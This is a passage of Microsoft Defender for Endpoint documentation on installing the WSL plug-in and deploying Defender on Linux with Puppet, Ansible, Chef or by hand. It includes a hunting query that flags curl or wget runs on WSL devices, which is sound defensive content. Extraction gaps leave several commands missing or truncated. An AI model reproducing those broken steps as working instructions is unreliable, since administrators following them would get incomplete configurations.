(https://security.microsoft.com ). Once a (any) distribution has been running long
enough (at least 30 minutes), it does show up.
3. If you're using a proxy in your (test) environment, make sure that the plug-in is set
up to use it correctly. WSL is typically not automatically configured to use a proxy.
For more information, see the section, Setting a proxy for Defender running in
WSL.
4. The use of a custom kernel in combination with the plug-in is not supported.
When you attempt to launch WSL with the plugin installed, you will encounter the
error A fatal error was returned by plugin 'DefenderforEndpointPlug-in'. Error
message: 'Custom Kernel/Configuration not supported.'.
Software prerequisites
WSL version 2.0.7 or later must be running with at least one active distro.
Run wsl --update to make sure you are on the latest version. If wsl -–version
shows a version older than 2.0.7, run wsl -–update –pre-release to get the latest
update.
Defender for Endpoint must be onboarded and running on the Windows host OS.
The host OS must be running Windows 10, version 2004 and higher (build 19041
and higher) or Windows 11 to support the Windows Subsystem for Linux versions
that can work with the plug-in.
Software components and installer file names

Installer: DefenderPlugin-x64-0.23.1102.4.msi . You can download it from the
onboarding page in the Microsoft Defender portal .
Installation directories:
C:\Program Files\
C:\ProgramData\
Components installed:
DefenderforEndpointPlug-in.dll . This DLL is the library to load Defender for
Endpoint to work within WSL. You can find it at C:\Program Files\Microsoft

Defender for Endpoint plug-in for WSL\plug-in.
healthcheck.exe . This program checks the health status of Defender for Endpoint
and enables you to see the installed versions of WSL, plug-in, and Defender for
Endpoint. You can find it at C:\Program Files\Microsoft Defender for Endpoint
plug-in for WSL\tools.
Installation steps
If you Windows Subsystem for Linux isn't installed yet, follow these steps:
1. Open Terminal or Command Prompt. (In Windows, go to Start > Command

Prompt. Or, right-click the start button and then select Terminal.)
2. Run the command wsl -–install .
Confirm WSL is installed and running

1. Using Terminal or Command Prompt, run wsl –update to make sure you have the
latest version.
2. Run the wsl command to ensure WSL is running before testing.
Install the plug-in

After WSL is running and fully up to date, follow these steps to install the plug-in:
1. Install the MSI file downloaded from the onboarding section in the Microsoft
Defender portal (Settings > Endpoints > Onboarding > Windows Subsystem for
Linux 2 (plug-in).)
2. Open a command prompt/terminal and run wsl .
You can deploy the package using Microsoft Intune.
７ Note
If WslService is running, it stops during the installation process. You do not need to
onboard the subsystem separately; instead, the plug-in automatically onboards to
the tenant the Windows host is onboarded to.
Installation validation checklist

1. After update or installation, wait for at least five minutes for the plug-in to fully
initialize and write log output.

3. Run the command: cd "C:\Program Files\Microsoft Defender for Endpoint plug-

in for WSL\tools" .
4. Run the command .\healthcheck.exe .
5. Review the details of Defender and WSL and make sure they match or exceed the
following:
Defender Plug-in Version: 0.23.1102.4
WSL Version: 2.0.7.0 or later
WSL Defender Version: 101.23092.0011
WSL Defender Health: Healthy
Setting a proxy for Defender running in WSL

This section describes how to configure proxy connectivity for the Defender for
Endpoint plug-in. If your enterprise uses a proxy to provide connectivity to Defender for
Endpoint running on the Windows host, continue reading to determine whether you
need to configure it for the plug-in.
Reuse the Defender for Endpoint static proxy setting ( TelemetryProxyServer ).
If you want to use the host static proxy configuration for MDE for the WSL plug-in,
nothing more is required. This configuration is adopted by the plug-in automatically.
Set up a different/specific proxy configuration for MDE

WSL
If you want to set up a different proxy for Defender running in WSL (other than the
Windows proxy specified with TelemetryProxyServer ), or you have currently configured
a system-wide proxy, the proxy configuration isn't automatically available for the plug-
in. In this case, take these steps:
1. Open Registry Editor as an administrator or use a tool that can configure registry
keys across devices.
2. Create a registry key with the following details:
Name: DefenderProxyServer
Type: REG_SZ
Value: IP address: port number (Example: 192.126.30.222:8888 )
Path:
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Lx
ss\Plugins\DefenderPlug-in
3. Once the registry is set, if WSL is already running or plug-in is already installed,
restart wsl using the following steps:
a. Open Command Prompt and run wsl --shutdown .

b. Then, run the command wsl .
Connectivity test for Defender running in WSL

The following procedure describes how to confirm that Defender in Endpoint in WSL has
internet connectivity.
1. Open Registry Editor as an administrator.
2. Create a registry key with the following details:
Name: ConnectivityTest
Type: REG_DWORD
Value: Number of seconds plug-in must wait before running test.
(Recommended: 60 seconds)
Path:
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Lx
ss\Plugins\DefenderPlug-in
3. Once the registry is set, restart wsl using the following steps:
a. Open Command Prompt and run wsl --shutdown .
b. Run the command wsl .
4. Wait for 5 minutes and then run healthcheck.exe (located at C:\Program

Files\Microsoft Defender for Endpoint plug-in for WSL\tools for the results of
the connectivity test).
If successful, the connectivity test shows success.
７ Note
To set a proxy for use in WSL containers (the distributions running on the
subsystem), see Advanced settings configuration in WSL.
Verifying functionality and SOC analyst

experience
After installing the plug-in, the subsystem and all its running containers are onboarded
to the Microsoft Defender portal .
1. Sign into the Microsoft Defender portal, and open the Devices view.
2. Filter using the tag WSL2.
You can see all WSL instances in your environment with an active Defender for Endpoint
plug-in for WSL. These instances represent all distributions running inside WSL on a
given host. The hostname of a device matches that of the Windows host. However, it's
represented as a Linux device.
3. Open the device page. In the Overview pane, there's a link for where the device is
hosted. The link enables you to understand that the device is running on a
Windows host. You can then pivot to the host for further investigation and/or
response.

The timeline is populated, similar to Defender for Endpoint on Linux, with events from
inside the subsystem (file, process, network). You can observe activity and detections in
the timeline view. Alerts and incidents are generated as appropriate as well.
Test the plug-in

To test the plug-in after installation, follow these steps:

2. Run the command wsl .
3. Download and extract the script file from https://aka.ms/LinuxDIY .
4. At the Linux prompt, run the command ./mde_linux_edr_diy.sh .
An alert should appear in the portal after a few minutes for a detection on the
WSL2 instance.
７ Note
It takes about 5 minutes for the events to appear on the Microsoft Defender
portal
Treat the machine as if it were a regular Linux host in your environment to perform
testing against. In particular, we would like to get your feedback on the ability to surface
potentially malicious behavior using the new plug-in.
Advanced hunting
In the Advanced Hunting schema, under the DeviceInfo table, there's a new attribute
called HostDeviceId that you can use to map a WSL instance to its Windows host device.
Here are a few sample hunting queries:
Get all WSL device IDs for the current organization/tenant
Kusto
Get all WSL device ids for the current organization/tenant

let wsl_endpoints = DeviceInfo
| where OSPlatform == "Linux" and isempty(HostDeviceId) != true
| distinct DeviceId;
wsl_endpoints
Get WSL device IDs and their corresponding host device IDs
Kusto
Get WSL device ids and their corresponding host device ids
DeviceInfo
| distinct WSLDeviceId=DeviceId, HostDeviceId
Get a list of WSL device IDs where curl or wget was run
Kusto
Get a list of WSL device ids where curl or wget was run
let wsl_endpoints = DeviceInfo
| distinct DeviceId;
DeviceProcessEvents
| where FileName == "curl" or FileName == "wget"
| where DeviceId in (wsl_endpoints)
| sort by Timestamp desc
Troubleshooting
1. The command healthcheck.exe shows the output, "Launch WSL distro with 'bash'
command and retry in 5 minutes."
2. If the previously mentioned error occurs, take the following steps:
a. Open a terminal instance and run the command wsl .
b. Wait for at least 5 minutes before rerunning the health check.
3. The healthcheck.exe command might show the output, "Waiting for Telemetry.
Please retry in 5 minutes."

If that error occurs, wait for 5 minutes and rerun healthcheck.exe .
4. If you don't see any devices in the Microsoft Defender portal, or you don't see any
events in the timeline, check these things:
If you aren't seeing a machine object, make sure sufficient time has passed
for onboarding to complete (typically up to 10 minutes).
Make sure to use the right filters, and that you have the appropriate
permissions assigned to view all device objects. (For example, is your
account/group is restricted to a specific group?)
Use the health check tool to provide an overview of overall plug-in health.
Open Terminal, and run the healthcheck.exe tool from C:\Program
Files\Microsoft Defender for Endpoint plug-in for WSL\tools .
Enable the connectivity test and check for Defender for Endpoint connectivity in
WSL. If the connectivity test fails, provide the output of the health check tool to
mdeforwsl-preview@microsoft.com.
5. In case you face any other challenges or issues, open the terminal and run the
following commands to generate the support bundle:
PowerShell
cd "C:\Program Files\Microsoft Defender for Endpoint plug-in for

WSL\tools"
PowerShell
.\healthcheck.exe --supportBundle
The support bundle can be found in the path provided by the previous command.
Feedback

on Linux with Puppet
Article • 07/18/2023
Applies to:

This article describes how to deploy Defender for Endpoint on Linux using Puppet. A
successful deployment requires the completion of all of the following tasks:

Create Puppet manifest
Deployment
Check onboarding status
） Important

For a description of prerequisites and system requirements for the current software
version, see the main Defender for Endpoint on Linux page.
In addition, for Puppet deployment, you need to be familiar with Puppet administration
tasks, have Puppet configured, and know how to deploy packages. Puppet has many
ways to complete the same task. These instructions assume availability of supported
Puppet modules, such as apt to help deploy the package. Your organization might use a
different workflow. Refer to the Puppet documentation for details.
Download the onboarding package from Microsoft Defender portal.
２ Warning


> Onboarding.
2. In the first drop-down menu, select Linux Server as the operating system. In the
second drop-down menu, select Your preferred Linux configuration management
tool as the deployment method.
3. Select Download onboarding package. Save the file as

4. From a command prompt, verify that you have the file.
Bash
ls -l
Output
total 8
-rw-r--r-- 1 test staff 4984 Feb 18 11:22
WindowsDefenderATPOnboardingPackage.zip
5. Extract the contents of the archive.
Bash
Output
inflating: mdatp_onboard.json
Create a Puppet manifest

You need to create a Puppet manifest for deploying Defender for Endpoint on Linux to
devices managed by a Puppet server. This example makes use of the apt and yumrepo
modules available from puppetlabs, and assumes that the modules have been installed
on your Puppet server.
Create the folders install_mdatp/files and install_mdatp/manifests under the modules

folder of your Puppet installation. This folder is typically located in
/etc/puppetlabs/code/environments/production/modules on your Puppet server. Copy the
mdatp_onboard.json file created above to the install_mdatp/files folder. Create an init.pp
file that contains the deployment instructions:
Bash
pwd
Output
/etc/puppetlabs/code/environments/production/modules
Bash
tree install_mdatp
Output
install_mdatp
├── files
│ └── mdatp_onboard.json
└── manifests
└── init.pp
Contents of install_mdatp/manifests/init.pp
Defender for Endpoint on Linux can be deployed from one of the following channels
(denoted below as [channel]): insiders-fast, insiders-slow, or prod. Each of these channels
corresponds to a Linux software repository.
offered to your device. Devices in insiders-fast are the first ones to receive updates and
new features, followed later by insiders-slow and lastly by prod.
In order to preview new features and provide early feedback, it is recommended that
you configure some devices in your enterprise to use either insiders-fast or insiders-slow.
２ Warning
Note your distribution and version and identify the closest entry for it under
https://packages.microsoft.com/config/[distro]/ .
In the below commands, replace [distro] and [version] with the information you've
identified:
７ Note
In case of RedHat, Oracle Linux, Amazon Linux 2, and CentOS 8, replace [distro] with
'rhel'.
puppet
# Puppet manifest to install Microsoft Defender for Endpoint on Linux.

# @param channel The release channel based on your environment, insider-fast
or prod.
# @param distro The Linux distribution in lowercase. In case of RedHat,
Oracle Linux, Amazon Linux 2, and CentOS 8, the distro variable should be
'rhel'.
# @param version The Linux distribution release number, e.g. 7.4.
class install_mdatp (
$channel = 'insiders-fast',
$distro = undef,
$version = undef
) {
case $facts['os']['family'] {
'Debian' : {
$release = $channel ? {
'prod' => $facts['os']['distro']['codename'],
default => $channel
}
apt::source { 'microsoftpackages' :
location =>
"https://packages.microsoft.com/${distro}/${version}/prod",
release => $release,
repos => 'main',
key => {
'id' => 'BC528686B50D79E339D3721CEB3E94ADBE1229CF',
'server' => 'keyserver.ubuntu.com',
},
}
}
'RedHat' : {
yumrepo { 'microsoftpackages' :
baseurl =>
"https://packages.microsoft.com/${distro}/${version}/${channel}",
descr => "packages-microsoft-com-prod-${channel}",
enabled => 1,
gpgcheck => 1,
gpgkey => 'https://packages.microsoft.com/keys/microsoft.asc',
}
}
default : { fail("${facts['os']['family']} is currently not supported.")
}
}
case $facts['os']['family'] {
/(Debian|RedHat)/: {
file { ['/etc/opt', '/etc/opt/microsoft', '/etc/opt/microsoft/mdatp']:
ensure => directory,
owner => root,
group => root,
mode => '0755',
}
file { '/etc/opt/microsoft/mdatp/mdatp_onboard.json':
source => 'puppet:///modules/install_mdatp/mdatp_onboard.json',
owner => root,
group => root,
mode => '0600',
require => File['/etc/opt/microsoft/mdatp'],
}
package { 'mdatp':
ensure => 'installed',
require => File['/etc/opt/microsoft/mdatp/mdatp_onboard.json'],
}
}
default : { fail("${facts['os']['family']} is currently not supported.")
}
}
}
Deployment
Include the above manifest in your site.pp file:
Bash
cat /etc/puppetlabs/code/environments/production/manifests/site.pp
Output
node "default" {
include install_mdatp
}
Enrolled agent devices periodically poll the Puppet Server and install new configuration
profiles and policies as soon as they are detected.
Monitor Puppet deployment

On the agent device, you can also check the onboarding status by running:
Bash
mdatp health
Output
...
licensed : true
org_id : "[your organization identifier]"
...
licensed: This confirms that the device is tied to your organization.

orgId: This is your Defender for Endpoint organization identifier.
Check onboarding status

You can check that devices have been correctly onboarded by creating a script. For
example, the following script checks enrolled devices for onboarding status:
Bash
mdatp health --field healthy
The above command prints 1 if the product is onboarded and functioning as expected.
） Important
When the product starts for the first time, it downloads the latest antimalware
definitions. Depending on your Internet connection, this can take up to a few
minutes. During this time the above command returns a value of 0 .
If the product is not healthy, the exit code (which can be checked through echo $? )
indicates the problem:
1 if the device isn't onboarded yet.

3 if the connection to the daemon cannot be established.
Log installation issues

For more information on how to find the automatically generated log that is created by
the installer when an error occurs, see Log installation issues.
Operating system upgrades

When upgrading your operating system to a new major version, you must first uninstall
Defender for Endpoint on Linux, install the upgrade, and finally reconfigure Defender for
Endpoint on Linux on your device.
Uninstallation
Create a module remove_mdatp similar to install_mdatp with the following contents in
init.pp file:
Bash
class remove_mdatp {
package { 'mdatp':
ensure => 'purged',
}
}
 Tip
Feedback

on Linux with Ansible
Article • 11/15/2023
Applies to:

This article describes how to deploy Defender for Endpoint on Linux using Ansible. A

Create Ansible YAML files
Deployment
References
） Important

Before you get started, see the main Defender for Endpoint on Linux page for a
description of prerequisites and system requirements for the current software version.
In addition, for Ansible deployment, you need to be familiar with Ansible administration
tasks, have Ansible configured, and know how to deploy playbooks and tasks. Ansible
has many ways to complete the same task. These instructions assume availability of
supported Ansible modules, such as apt and unarchive to help deploy the package. Your
organization might use a different workflow. Refer to the Ansible documentation for
details.
Ansible needs to be installed on at least one computer (Ansible calls this the
control node).
SSH must be configured for an administrator account between the control node
and all managed nodes (devices that will have Defender for Endpoint installed on
them), and it is recommended to be configured with public key authentication.
The following software must be installed on all managed nodes:

curl
python-apt (if you are deploying on distributions using apt as a package
manager)
All managed nodes must be listed in the following format in the

/etc/ansible/hosts or relevant file:
Bash
[servers]
host1 ansible_ssh_host=10.171.134.39
host2 ansible_ssh_host=51.143.50.51
Ping test:
Bash
ansible -m ping all

２ Warning


> Onboarding.

4. From a command prompt, verify that you have the file. Extract the contents of the
archive:
Bash
ls -l
Output
total 8
Bash
Output
inflating: mdatp_onboard.json
Create Ansible YAML files

Create a subtask or role files that contribute to a playbook or task.
Create the onboarding task, onboarding_setup.yml :
Bash
- name: Create MDATP directories

file:
path: /etc/opt/microsoft/mdatp/
recurse: true
state: directory
mode: 0755
owner: root
group: root
- name: Register mdatp_onboard.json

stat:
path: /etc/opt/microsoft/mdatp/mdatp_onboard.json
register: mdatp_onboard
- name: Extract WindowsDefenderATPOnboardingPackage.zip into

/etc/opt/microsoft/mdatp
unarchive:
src: WindowsDefenderATPOnboardingPackage.zip
dest: /etc/opt/microsoft/mdatp
mode: 0600
owner: root
group: root
when: not mdatp_onboard.stat.exists
Add the Defender for Endpoint repository and key, add_apt_repo.yml :
Defender for Endpoint on Linux can be deployed from one of the following
channels (denoted below as [channel]): insiders-fast, insiders-slow, or prod. Each of
these channels corresponds to a Linux software repository.
offered to your device. Devices in insiders-fast are the first ones to receive updates
and new features, followed later by insiders-slow and lastly by prod.
In order to preview new features and provide early feedback, it is recommended

that you configure some devices in your enterprise to use either insiders-fast or
insiders-slow.
２ Warning
In the following commands, replace [distro] and [version] with the information
you've identified.
７ Note
In case of Oracle Linux and Amazon Linux 2, replace [distro] with "rhel". For
Amazon Linux 2, replace [version] with "7". For Oracle utilize, replace [version]
with the version of Oracle Linux.
Bash
- name: Add Microsoft APT key

apt_key:
url: https://packages.microsoft.com/keys/microsoft.asc
state: present
when: ansible_os_family == "Debian"
- name: Add Microsoft apt repository for MDATP

apt_repository:
repo: deb [arch=arm64,armhf,amd64]
https://packages.microsoft.com/[distro]/[version]/prod [codename] main
update_cache: yes
state: present
filename: microsoft-[channel]
when: ansible_os_family == "Debian"
- name: Add Microsoft DNF/YUM key

rpm_key:
state: present
key: https://packages.microsoft.com/keys/microsoft.asc
when: ansible_os_family == "RedHat"
- name: Add Microsoft yum repository for MDATP

yum_repository:
name: packages-microsoft-[channel]
description: Microsoft Defender for Endpoint
file: microsoft-[channel]
baseurl:
https://packages.microsoft.com/[distro]/[version]/[channel]/
gpgcheck: yes
enabled: Yes
when: ansible_os_family == "RedHat"
Create the Ansible install and uninstall YAML files.
For apt-based distributions use the following YAML file:
Bash
cat install_mdatp.yml
Output
- hosts: servers
tasks:
- include: ../roles/onboarding_setup.yml
- include: ../roles/add_apt_repo.yml
- name: Install MDATP
apt:
name: mdatp
state: latest
update_cache: yes
Bash
cat uninstall_mdatp.yml
Output
- hosts: servers
tasks:
- name: Uninstall MDATP
apt:
name: mdatp
state: absent
For dnf-based distributions use the following YAML file:
Bash
cat install_mdatp_dnf.yml
Output
- hosts: servers
tasks:
- include: ../roles/onboarding_setup.yml
- include: ../roles/add_yum_repo.yml
- name: Install MDATP
dnf:
name: mdatp
state: latest
enablerepo: packages-microsoft-[channel]
Bash
cat uninstall_mdatp_dnf.yml
Output
- hosts: servers
tasks:
- name: Uninstall MDATP
dnf:
name: mdatp
state: absent
Deployment
Now run the tasks files under /etc/ansible/playbooks/ or relevant directory.
Installation:
Bash
ansible-playbook /etc/ansible/playbooks/install_mdatp.yml -i
/etc/ansible/hosts
） Important
minutes.
Validation/configuration:
Bash
ansible -m shell -a 'mdatp connectivity test' all
Bash
ansible -m shell -a 'mdatp health' all
Uninstallation:
Bash
ansible-playbook /etc/ansible/playbooks/uninstall_mdatp.yml -i
/etc/ansible/hosts

See Log installation issues for more information on how to find the automatically
generated log that is created by the installer when an error occurs.

References
Add or remove YUM repositories
Manage packages with the dnf package manager
Add and remove APT repositories
Manage apt-packages
See also
Investigate agent health issues
 Tip
Feedback

Deploy Defender for Endpoint on Linux
with Chef
Article • 02/21/2024
Applies to:

） Important
Before you begin: Install unzip if it's not already installed.
The Chef components are already installed and a Chef repository exists (chef generate
repo <reponame>) to store the cookbook that's used to deploy to Defender for
Endpoint on Chef managed Linux servers.
You can create a new cookbook in your existing repository by running the following
command from inside the cookbooks folder that is in your chef repository:
Bash
chef generate cookbook mdatp
This command creates a new folder structure for the new cookbook called mdatp. You
can also use an existing cookbook if you already have one you'd like to use to add the
Defender for Endpoint deployment into. After the cookbook is created, create a files
folder inside the cookbook folder that just got created:
Bash
mkdir mdatp/files
Transfer the Linux Server Onboarding zip file that can be downloaded from the
Microsoft Defender portal to this new files folder.
２ Warning

On the Chef Workstation, navigate to the mdatp/recipes folder. This folder is created
when the cookbook was generated. Use your preferred text editor (like vi or nano) to
add the following instructions to the end of the default.rb file:
include_recipe '::onboard_mdatp'
include_recipe '::install_mdatp'
Then save and close the default.rb file.
Next create a new recipe file named install_mdatp.rb in the recipes folder and add this
text to the file:
PowerShell
#Add Microsoft Defender

Repo
case node['platform_family']
when 'debian'
apt_repository 'MDAPRepo' do
arch 'amd64'
cache_rebuild true
cookbook false
deb_src false
key 'BC528686B50D79E339D3721CEB3E94ADBE1229CF'
keyserver "keyserver.ubuntu.com"
distribution 'focal'
repo_name 'microsoft-prod'
components ['main']
trusted true
uri
"https://packages.microsoft.com/config/ubuntu/20.04/prod"
end
apt_package "mdatp"
when 'rhel'
yum_repository 'microsoft-prod' do
baseurl "https://packages.microsoft.com/config/rhel/7/prod/"
description "Microsoft Defender for Endpoint"
enabled true
gpgcheck true
gpgkey "https://packages.microsoft.com/keys/microsoft.asc"
end
if node['platform_version'] <= 8 then
yum_package "mdatp"
else
dnf_package "mdatp"
end
end
You need to modify the version number, distribution, and repo name to match the
version you're deploying to and the channel you'd like to deploy. Next you should
create an onboard_mdatp.rb file in the mdatp/recipies folder. Add the following text to
that file:
PowerShell
#Create MDATP Directory

mdatp = "/etc/opt/microsoft/mdatp"
zip_path = "/path/to/chef-
repo/cookbooks/mdatp/files/WindowsDefenderATPOnboardingPackage.zip"
directory "#{mdatp}" do
owner 'root'
group 'root'
mode 0755
recursive true
end
#Extract WindowsDefenderATPOnbaordingPackage.zip into

/etc/opt/microsoft/mdatp
bash 'Extract Onbaording Json MDATP' do

code <<-EOS
unzip #{zip_path} -d #{mdatp}
EOS
not_if { ::File.exist?('/etc/opt/microsoft/mdatp/mdatp_onboard.json') }
end
Make sure to update the path name to the location of the onboarding file. To test
deploy it on the Chef workstation, run sudo chef-client -z -o mdatp . After your
deployment, you should consider creating and deploying a configuration file to the
servers based on Set preferences for Microsoft Defender for Endpoint on Linux. After
creating and testing your configuration file, you can put it into the
cookbook/mdatp/files folder where you also placed the onboarding package. Then you
can create a settings_mdatp.rb file in the mdatp/recipies folder and add this text:
PowerShell
#Copy the configuration file

cookbook_file '/etc/opt/microsoft/mdatp/managed/mdatp_managed.json' do
source 'mdatp_managed.json'
owner 'root'
group 'root'
mode '0755'
action :create
end
To include this step as part of the recipe just add include_recipe ':: settings_mdatp to
your default.rb file within the recipe folder.
You can also use crontab to schedule automatic updates Schedule an update of the
Microsoft Defender for Endpoint (Linux).
Uninstall MDATP cookbook:
PowerShell
#Uninstall the Defender package

case node['platform_family']
when 'debian'
apt_package "mdatp" do
action :remove
end
when 'rhel'
if node['platform_version'] <= 8
then
yum_package "mdatp" do
action :remove
end
else
dnf_package "mdatp" do
action :remove
end
end
end
 Tip
Feedback

on Linux manually
Article • 02/21/2024
Applies to:

 Tip
Looking for advanced guidance on deploying Microsoft Defender for Endpoint on

Linux? See Advanced deployment guide on Defender for Endpoint on Linux.
This article describes how to deploy Microsoft Defender for Endpoint on Linux manually.
A successful deployment requires the completion of all of the following tasks:

Configure the Linux software repository
RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky and
Alma)
SLES and variants
Ubuntu and Debian systems
Mariner
Application installation
RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky and
Alma)
SLES and variants
Mariner
Client configuration

Before you get started, see Microsoft Defender for Endpoint on Linux for a description
of prerequisites and system requirements for the current software version.
２ Warning
Upgrading your operating system to a new major version after the product
installation requires the product to be reinstalled. You need to Uninstall the
existing Defender for Endpoint on Linux, upgrade the operating system, and then
reconfigure Defender for Endpoint on Linux following the below steps.
Configure the Linux software repository

Defender for Endpoint on Linux can be deployed from one of the following channels
(denoted below as [channel]): insiders-fast, insiders-slow, or prod. Each of these channels
corresponds to a Linux software repository. The instructions in this article describe
configuring your device to use one of these repositories.
offered to your device. Devices in insiders-fast are the first ones to receive updates and
new features, followed later by insiders-slow and lastly by prod.
configure some devices in your enterprise to use either insiders-fast or insiders-slow.
２ Warning
Installer script
While we discuss manual installation, alternatively, you can use an automated installer
bash script provided in our public GitHub repository . The script identifies the
distribution and version, simplifies the selection of the right repository, sets up the
device to pull the latest package, and combines the product installation and onboarding
steps.
Bash
> ./mde_installer.sh --help
usage: basename ./mde_installer.sh [OPTIONS]
Options:
-c|--channel specify the channel from which you want to install.
Default: insiders-fast
-i|--install install the product
-r|--remove remove the product
-u|--upgrade upgrade the existing product
-o|--onboard onboard/offboard the product with <onboarding_script>
-p|--passive-mode set EPP to passive mode
-t|--tag set a tag by declaring <name> and <value>. ex: -t GROUP
Coders
-m|--min_req enforce minimum requirements
-w|--clean remove repo from package manager for a specific channel
-v|--version print out script version
-h|--help display help
Read more here .
RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon

Linux 2, Rocky and Alma)
Install yum-utils if it isn't installed yet:
Bash
sudo yum install yum-utils
７ Note
Your distribution and version, and identify the closest entry (by major, then
minor) for it under https://packages.microsoft.com/config/rhel/ .
Use the following table to help guide you in locating the package:
ﾉ Expand table
Distro & version Package
For Alma 8.4 and https://packages.microsoft.com/config/alma/8/prod.repo

higher
For Alma 9.2 and https://packages.microsoft.com/config/alma/9/prod.repo

higher
Distro & version Package
For https://packages.microsoft.com/config/rhel/9/prod.repo
RHEL/Centos/Oracle
9.0-9.8
For https://packages.microsoft.com/config/rhel/8/prod.repo
RHEL/Centos/Oracle
8.0-8.8
For https://packages.microsoft.com/config/rhel/7.2/prod.repo
RHEL/Centos/Oracle
7.2-7.9 & Amazon
Linux 2
For Amazon Linux https://packages.microsoft.com/config/amazonlinux/2023/prod.repo

2023
For Fedora 33 https://packages.microsoft.com/config/fedora/33/prod.repo
For Fedora 34 https://packages.microsoft.com/config/fedora/34/prod.repo
For Rocky 8.7 and https://packages.microsoft.com/config/rocky/8/prod.repo

higher
For Rocky 9.2 and https://packages.microsoft.com/config/rocky/9/prod.repo

higher
In the following commands, replace [version] and [channel] with the information
you've identified:
Bash
sudo yum-config-manager --add-

repo=https://packages.microsoft.com/config/rhel/[version]/[channel].rep
o
 Tip
Use hostnamectl command to identify system related information including

release [version].
For example, if you're running CentOS 7 and want to deploy Defender for Endpoint
on Linux from the prod channel:
Bash
repo=https://packages.microsoft.com/config/rhel/7/prod.repo
Or if you wish to explore new features on selected devices, you might want to
deploy Microsoft Defender for Endpoint on Linux to insiders-fast channel:
Bash

repo=https://packages.microsoft.com/config/rhel/7/insiders-fast.repo
Install the Microsoft GPG public key:
Bash
sudo rpm --import https://packages.microsoft.com/keys/microsoft.asc
SLES and variants
７ Note
Your distribution and version, and identify the closest entry (by major, then minor)
for it under https://packages.microsoft.com/config/sles/ .
In the following commands, replace [distro] and [version] with the information you've
identified:
Bash
sudo zypper addrepo -c -f -n microsoft-[channel]

https://packages.microsoft.com/config/[distro]/[version]/[channel].repo
 Tip
Use SPident command to identify system related information including release

[version].
For example, if you're running SLES 12 and wish to deploy Microsoft Defender for
Endpoint on Linux from the prod channel:
Bash
sudo zypper addrepo -c -f -n microsoft-prod

https://packages.microsoft.com/config/sles/12/prod.repo
Bash
sudo rpm --import https://packages.microsoft.com/keys/microsoft.asc

Install curl if it isn't installed yet:
Bash
sudo apt-get install curl
Install libplist-utils if it isn't installed yet:
Bash
sudo apt-get install libplist-utils
７ Note
Your distribution and version, and identify the closest entry (by major, then
minor) for it under https://packages.microsoft.com/config/[distro]/ .
In the following command, replace [distro] and [version] with the information
you've identified:
Bash
curl -o microsoft.list
https://packages.microsoft.com/config/[distro]/[version]/[channel].list
 Tip
Use hostnamectl command to identify system related information including
release [version].
For example, if you're running Ubuntu 18.04 and wish to deploy Microsoft
Defender for Endpoint on Linux from the prod channel:
Bash
https://packages.microsoft.com/config/ubuntu/18.04/prod.list
Install the repository configuration:
Bash
sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-

[channel].list
For example, if you chose prod channel:
Bash
sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-prod.list
Install the gpg package if not already installed:
Bash
sudo apt-get install gpg
If gpg is not available, then install gnupg .
Bash
sudo apt-get install gnupg

For Debian 11 and earlier, run the following command.
Bash
curl -sSL https://packages.microsoft.com/keys/microsoft.asc | gpg --

dearmor | sudo tee /etc/apt/trusted.gpg.d/microsoft.gpg > /dev/null
For Debian 12 and later, run the following command.
Bash
curl -sSL https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor

| sudo tee /usr/share/keyrings/microsoft-prod.gpg > /dev/null
Install the HTTPS driver if not already installed:
Bash
sudo apt-get install apt-transport-https
Update the repository metadata:
Bash
sudo apt-get update
Mariner
Install dnf-plugins-core if it isn't installed yet:
Bash
sudo dnf install dnf-plugins-core
Configure and Enable the required repositories
７ Note
On Mariner, Insider Fast Channel is not available.
If you want to deploy Defender for Endpoint on Linux from the prod channel. Use
the following commands
Bash
sudo dnf install mariner-repos-extras

sudo dnf config-manager --enable mariner-official-extras
Or if you wish to explore new features on selected devices, you might want to
deploy Microsoft Defender for Endpoint on Linux to insiders-slow channel. Use the
following commands:
Bash
sudo dnf install mariner-repos-extras-preview

sudo dnf config-manager --enable mariner-official-extras-preview
Application installation
RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon

Linux 2, Rocky and Alma)
Bash
sudo yum install mdatp
７ Note
If you have multiple Microsoft repositories configured on your device, you can be
specific about which repository to install the package from. The following example
shows how to install the package from the production channel if you also have the
insiders-fast repository channel configured on this device. This situation can
happen if you are using multiple Microsoft products on your device. Depending on
the distribution and the version of your server, the repository alias might be
different than the one in the following example.
Bash
# list all repositories

yum repolist
Console
...
packages-microsoft-com-prod packages-microsoft-com-prod
316
packages-microsoft-com-prod-insiders-fast packages-microsoft-com-prod-ins
2
...
Bash
# install the package from the production repository

sudo yum --enablerepo=packages-microsoft-com-prod install mdatp
SLES and variants

Bash
sudo zypper install mdatp
７ Note
happen if you are using multiple Microsoft products on your device.
Bash
zypper repos
Console
...
# | Alias | Name | ...
XX | packages-microsoft-com-insiders-fast | microsoft-insiders-fast | ...
XX | packages-microsoft-com-prod | microsoft-prod | ...
...
Bash
sudo zypper install packages-microsoft-com-prod:mdatp

Bash
７ Note
Bash
cat /etc/apt/sources.list.d/*
Console
deb [arch=arm64,armhf,amd64]
https://packages.microsoft.com/config/ubuntu/18.04/prod insiders-fast main
deb [arch=amd64] https://packages.microsoft.com/config/ubuntu/18.04/prod
bionic main
Bash
sudo apt -t bionic install mdatp
７ Note
Reboots are NOT required after installing or updating Microsoft Defender for
Endpoint on Linux except when you're running auditD in immutable mode.
Mariner
Bash
sudo dnf install mdatp
７ Note
insiders-slow repository channel configured on this device. This situation can
Bash
sudo dnf config-manager --disable mariner-official-extras-preview

sudo dnf config-manager --enable mariner-official-extras

２ Warning

） Important
If you miss this step, any command executed will show a warning message
indicating that the product is unlicensed. Also the mdatp health command returns
a value of false .
1. In the Microsoft Defender portal, go to Settings > Endpoints > Device

second drop-down menu, select Local Script as the deployment method.


4. From a command prompt, verify that you have the file, and extract the contents of
the archive:
Bash
ls -l
Console
total 8
Bash
Console
inflating: MicrosoftDefenderATPOnboardingLinuxServer.py
Client configuration
1. Copy MicrosoftDefenderATPOnboardingLinuxServer.py to the target device.
７ Note
Initially the client device is not associated with an organization and the orgId
attribute is blank.
Bash
